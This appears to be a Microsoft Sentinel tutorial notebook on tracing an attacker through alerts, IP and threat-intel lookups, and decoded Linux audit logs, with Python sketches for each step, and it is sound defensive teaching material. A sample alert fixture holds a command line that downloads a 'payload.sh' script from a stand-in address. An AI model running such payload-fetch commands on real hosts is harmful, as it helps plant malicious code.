Path: blob/master/tutorials-and-examples/deprecated-notebooks/Example - Step-by-Step Linux-Windows-Office Investigation.ipynb
Title: Sample Hunting and Investigation in Jupyter
Linux, Windows, Network and Office data
Notebook Version: 1.0
[Platform Requirements](#platform_reqs)
Description:
This is an example notebook demonstrating techniques to trace the path of an attacker in an organization. Most of the steps use relatively simple Log Analytics queries but it also includes a few more advanced procedures such as:
Unpacking and decoding Linux Audit logs
Clustering events to collapse repetitive items
Various visualizations
Technically, the narrative in this notebook is more an investigation than hunting, since the starting point is an alert rather than threat intelligence. However, many of the techniques here - such as investigating process activity on Linux and Windows hosts and establishing intercommunication via network analysis - are applicable to hunting scenarios as well.
The Investigation Narrative
From an initial alert (or suspect IP address), examine activity on a Linux host, a Windows host and an Office subscription. Discover malicious activity related to the IP address in each of these.
Warning: Example Notebook - Not for production use!
This notebook is meant to be illustrative of specific scenarios and is not actively maintained. It is unlikely to be runnable directly in your environment. Instead, please use the notebooks in the root of this repo.
Table of Contents
Setup
Make sure that you have installed the packages specified in the setup (uncomment the lines to execute).
Install Packages
If this is the first time you are running any of the Microsoft Sentinel notebooks, you should run the ConfiguringNotebookEnvironment notebook before continuing with this notebook. If you are just viewing the notebook, this is not necessary.
Import Packages
Once packages are installed run the next cell to import them.
Part 1 - Threat Intel Report
Getting IoC IP Addresses
Threat intelligence is a vital tool in the armory of hunters and security investigators. Many companies subscribe to Threat Intelligence feeds from companies like Project Cymru, FireEye, Crowdstrike and others (Microsoft Sentinel customers can use these data subscriptions to enhance their alerts and queries in Microsoft Sentinel). In other cases your threat intel may arrive via a CERT notification or a random tip-off of activity via email.
For the purposes of this notebook, and to make it more accessible to those who don't have ready access to a threat intelligence feed, we're going to scrape some threat intelligence Indicators of Compromise (IoCs) from a public report.
Let's pick a recent report from FireEye: "WinRAR Zero-day Abused in Multiple Campaigns" by Dileep Kumar Jallepalli.
The content of this report is not directly relevant to our investigation - we're just using this as an example of something that you might receive and want to check whether any of the Indicators of Compromise (IoCs) listed in the report show up in your organization. I would stress that this is not a recommended way to consume threat intelligence data from FireEye or any other company and is only done here to provide a starting point for the notebook and accompanying blog. For one thing, you may be in violation of the company's terms of service and, for another, the threat intel listed in these types of reports represents a tiny fraction of the data that these companies provide as part of a commercial agreement.
We want to quickly extract relevant IoCs from reports and emails. Although this isn't the original purpose of this module we can use IoCExtract to help us do this.
At this point we're going to cheat a little (I said earlier that the FireEye report was not related to the notebook). We will take the list of IPs from the report and add in the IP address of our fictional attacker.
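As a rough illustration of the extraction step, here is a minimal sketch that pulls IPv4 addresses out of free text using only the Python standard library. It is a stand-in for the idea, not the IoCExtract implementation: the function name `extract_ipv4`, the sample text and the attacker address (taken from the reserved documentation ranges) are all assumptions made for this example.

```python
import ipaddress
import re

# Candidate dotted quads. The lookarounds reject fragments of longer dotted
# strings (such as version numbers) but allow a trailing full stop.
IPV4_CANDIDATE = re.compile(r"(?<!\d)(?<!\d\.)(?:\d{1,3}\.){3}\d{1,3}(?!\d|\.\d)")


def extract_ipv4(text):
    """Return the unique, valid IPv4 addresses in text, in order of appearance."""
    found = []
    for candidate in IPV4_CANDIDATE.findall(text):
        try:
            # Reject out-of-range octets such as 999.1.1.1
            ipaddress.IPv4Address(candidate)
        except ValueError:
            continue
        if candidate not in found:
            found.append(candidate)
    return found


# Hypothetical report text, not taken from the FireEye report
report_text = (
    "C2 servers were seen at 198.51.100.7 and 203.0.113.25. "
    "Build 1.2.3.4.5 is not an address, and neither is 999.1.1.1."
)
ioc_ips = extract_ipv4(report_text)

# Append the (hypothetical) attacker address, as described in the text above
attacker_ip = "192.0.2.10"
ioc_ips.append(attacker_ip)
```

Validating each candidate with `ipaddress` keeps the regular expression simple while still discarding strings that only look like addresses.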
Authenticate to Microsoft Sentinel
Get the Workspace ID
To find your Workspace ID, go to Log Analytics. Look at the workspace properties to find the ID.
Read Workspace configuration from local config.json for workspace {{cookiecutter.workspace_name}}
TENANT_ID: 72f988bf-86f1-41af-91ab-2d7cd011db47
SUBSCRIPTION_ID: {{cookiecutter.subscription_id}}
RESOURCE_GROUP: {{cookiecutter.resource_group}}
WORKSPACE_ID: 52b1ab41-869e-4138-9e40-2a4457f09bf0
WORKSPACE_NAME: {{cookiecutter.workspace_name}}
Authenticate to Log Analytics
If you are using user/device authentication, run the following cell.
Click the 'Copy code to clipboard and authenticate' button.
This will pop up an Azure Active Directory authentication dialog (in a new tab or browser window). The device code will have been copied to the clipboard.
Select the text box and paste (Ctrl-V/Cmd-V) the copied value.
You should then be redirected to a user authentication page where you should authenticate with a user account that has permission to query your Log Analytics workspace.
Use the following syntax if you are authenticating using an Azure Active Directory AppId and Secret:
instead of
Note: you may occasionally see a JavaScript error displayed at the end of the authentication - you can safely ignore this.
On successful authentication you should see a popup schema button.
Search for C2
Set Query Time Range
Specify a time range to search for alerts. Once this is set, run the following cell to retrieve any alerts in that time window. You can change the time range and re-run the queries until you find the alerts that you want.
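For readers without the notebook widgets to hand, the following sketch shows one way a time window around an origin time could be turned into a query filter. It is an illustration under stated assumptions rather than the notebook's own cell: the helper names, the origin time, the IP address and the exact query text (including the use of the `SecurityAlert` table's `TimeGenerated` and `Entities` columns) are chosen for this example.

```python
from datetime import datetime, timedelta, timezone


def query_time_range(origin, days_before=1, days_after=1):
    """Return (start, end) datetimes bracketing the origin time."""
    return origin - timedelta(days=days_before), origin + timedelta(days=days_after)


def to_kql_datetime(value):
    """Format a timezone-aware datetime as a KQL datetime literal in UTC."""
    return value.astimezone(timezone.utc).strftime("datetime(%Y-%m-%dT%H:%M:%SZ)")


def alerts_query(start, end, ip):
    """Build an illustrative alert query limited to the window and one IP."""
    return (
        "SecurityAlert\n"
        f"| where TimeGenerated between ({to_kql_datetime(start)} .. {to_kql_datetime(end)})\n"
        f'| where Entities has "{ip}"'
    )


# Hypothetical origin time and IP address
origin = datetime(2019, 3, 30, 12, 0, tzinfo=timezone.utc)
start, end = query_time_range(origin, days_before=1, days_after=1)
query = alerts_query(start, end, "192.0.2.10")
print(query)
```

Widening `days_before` or `days_after` and rebuilding the query mirrors the change-and-re-run loop described above.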
We can see that we have 14 alerts in that period that match the final IP in the list. Let's have a look at those.
Examine an Alert
Pick an alert from a list of retrieved alerts.
This section extracts the alert information and entities into a SecurityAlert object allowing us to query the properties more reliably.
In particular, we use the alert to automatically provide parameters for queries and UI elements. Subsequent queries will use properties like the host name and derived properties such as the OS family (Linux or Windows) to adapt the query. Query time selectors like the one above will also default to an origin time that matches the alert selected.
The alert view below shows all of the main properties of the alert plus the extended property dictionary (if any) and JSON representations of the Entity.
Select alert from list
As you select an alert, the main properties will be shown below the list.
Use the filter box to narrow down your search to any substring in the AlertName.
Looking at the SSH Anomalous logons, we can see our IP address as the origin IP. Looking at the one SuspiciousFileDownload alert, we can see (buried in the Process Entity) that the same IP address was used as the host address in an HTTP download.
Check alert for IP addresses not contained in entities
Additional IP addresses found in alert are shown below.
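One way to picture this check: search every field of the alert for IPv4-like strings, then subtract the addresses already present as IP entities. The sketch below assumes the alert is available as a plain dictionary. The field names (`Entities`, `Type`, `Address`, `CommandLine`) and the sample alert are hypothetical and only loosely modelled on the alert described above.

```python
import json
import re

# Dotted-quad pattern; octet ranges are not validated in this sketch
IPV4 = re.compile(r"(?<!\d)(?<!\d\.)(?:\d{1,3}\.){3}\d{1,3}(?!\d|\.\d)")


def ips_not_in_entities(alert):
    """Return IPs found anywhere in the alert that are not IP entities."""
    entity_ips = {
        entity.get("Address")
        for entity in alert.get("Entities", [])
        if entity.get("Type") == "ip"
    }
    # Serialize the whole alert so that nested fields are searched too
    all_ips = set(IPV4.findall(json.dumps(alert)))
    return sorted(all_ips - entity_ips)


# Hypothetical alert: one IP entity plus an address buried in a command line
sample_alert = {
    "AlertName": "SuspiciousFileDownload",
    "Entities": [
        {"Type": "ip", "Address": "192.0.2.10"},
        {"Type": "process", "CommandLine": "wget http://203.0.113.25/payload.sh"},
    ],
}
extra_ips = ips_not_in_entities(sample_alert)
```

Here `extra_ips` contains only the address from the command line, because the other address is already an IP entity.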
Basic IP Checks
Reverse IP and WhoIs
Geo IP Lookup
Where does this communication come from?
Threat Intel - Check the IP Address for known malicious addresses
Lookup in Microsoft Sentinel Bring-Your-Own-Threat-Intel
Lookup in VirusTotal
End of Part 1
We've seen:
how to search for IoCs across the different data sets in Microsoft Sentinel
how to use IoCExtract to pull out observables from arbitrary text
some of the UI helper widgets, such as the query time selector and alert display, that help with quickly assembling a useful notebook
how to use the GeoIP lookup and mapping tools
how to use the VirusTotal lookup to check IPs for known malware origins
In the next part we'll focus on one of the hosts that we already know has been communicating with one of the suspect IPs and see if we can confirm this to be a successful attack or not. We'll then go on to see what we can learn from network traffic recorded in some of the other data sets to see if the attack has spread beyond this single host.
Part 2 - See What's going on on the Affected Host - Linux
In the next two sections we will examine the host where the alert originated. In this case it is a Linux host. While we can get some useful information from standard syslog, we have audit logging configured on our hosts to give us detailed process and logon events.
The only tricky part is that the data is not currently in a very friendly format.
This is a good example of combining Log Analytics/Kusto processing with some local Python processing to extract data from arbitrary log types.
Using Linux Audit data to view processes
Linux Audit Logs - To Dos
There are a few things that we need to deal with here:
Splitting and unpacking the fields in each rawdata field
Some events (like process exec) have multiple rows associated with them - we need to join these together into a single row
Some string fields are hex-encoded (this is to allow embedded characters like spaces)
We also need to extract the timestamp from the msg field (this is stored as a Unix timestamp float)
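The four steps above can be sketched in plain Python. This is a minimal illustration that assumes the raw data resembles standard auditd records (`type=... msg=audit(<timestamp>:<event id>): key=value ...`); the layout of the data in your workspace may differ. The helper names, the set of fields treated as hex-encoded strings and the sample records are assumptions made for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

MSG_RE = re.compile(r"audit\((?P<ts>\d+\.\d+):(?P<id>\d+)\)")
TYPE_RE = re.compile(r"\btype=(\w+)")
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
HEX_RE = re.compile(r"(?:[0-9A-Fa-f]{2})+")
# Assumption: fields that hold strings and may therefore be hex-encoded
STRING_FIELDS = {"exe", "comm", "cwd", "name", "proctitle"}


def decode_value(rec_type, key, value):
    """Strip quotes, or hex-decode unquoted values of known string fields."""
    if len(value) >= 2 and value[0] == value[-1] == '"':
        return value[1:-1]
    # a0, a1, ... are command-line strings only in EXECVE records; in SYSCALL
    # records they are numeric arguments and must be left alone.
    is_string = key in STRING_FIELDS or (
        rec_type == "EXECVE" and re.fullmatch(r"a\d+", key) is not None
    )
    if is_string and HEX_RE.fullmatch(value):
        try:
            return bytes.fromhex(value).decode("utf-8")
        except UnicodeDecodeError:
            return value
    return value


def parse_line(line):
    """Split one raw record into (event_id, timestamp, record type, fields)."""
    msg = MSG_RE.search(line)
    type_match = TYPE_RE.search(line)
    if msg is None or type_match is None:
        return None
    rec_type = type_match.group(1)
    when = datetime.fromtimestamp(float(msg.group("ts")), tz=timezone.utc)
    fields = {
        key: decode_value(rec_type, key, value)
        for key, value in FIELD_RE.findall(line[msg.end():])
    }
    return msg.group("id"), when, rec_type, fields


def merge_events(lines):
    """Join all rows that share an audit event ID into a single dictionary."""
    events = defaultdict(dict)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        event_id, when, rec_type, fields = parsed
        events[event_id]["timestamp"] = when
        for key, value in fields.items():
            # Prefix with the record type so SYSCALL.a0 and EXECVE.a0 stay apart
            events[event_id][f"{rec_type}.{key}"] = value
    return dict(events)


# Hypothetical records for one process exec event (two rows, same event ID)
raw_rows = [
    'type=SYSCALL msg=audit(1553898042.500:4567): arch=c000003e syscall=59 '
    'success=yes exe="/usr/bin/wget" comm="wget"',
    'type=EXECVE msg=audit(1553898042.500:4567): argc=2 a0="wget" '
    "a1=687474703A2F2F6578616D706C652E636F6D2F6120622E7368",
]
events = merge_events(raw_rows)
```

Restricting hex decoding to named fields is a deliberate choice: an unquoted value such as `3132` could be either a number or an encoded string, and the record format alone does not say which.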